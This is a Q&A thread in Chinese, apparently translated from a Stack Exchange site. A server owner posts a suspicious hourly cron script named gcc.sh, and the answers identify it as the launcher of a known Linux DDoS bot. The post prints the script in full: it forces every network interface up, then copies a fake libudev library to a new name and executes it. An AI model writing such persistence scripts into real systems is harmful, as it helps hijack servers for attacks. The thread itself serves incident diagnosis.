我的服务器上遇到了高达1 Gbps的峰值,并一直在寻找病毒和恶意软件。我在/etc/cron.hourly中找到了这个文件:gcc.sh,并且想知道是否有人看过类似的东西,并且会对代码有所了解。谢谢!
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
答案 0 :(得分:9)
很可能。它使用/lib/libudev.so.6作为可执行文件,而名称暗示它应该是一个库 - 尝试使用像nm或objdump这样的工具来查看它是否是可执行文件。它从/lib/libudev.so复制到.so.6 - 而.so通常是版本化符号的符号链接。它还运行for循环以显示所有网络连接,即使您已将其关闭。它使用着名的编译器的名称来看起来合法。我称之为99%+可能是病毒。
找到另一个自称为gcc - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver的引用。是的,这是unix系统上的DDoS病毒,与您的问题完全匹配。
答案 1 :(得分:0)
是的。
尝试使用ps -ef | grep -i libudev.so.6查看程序使用的进程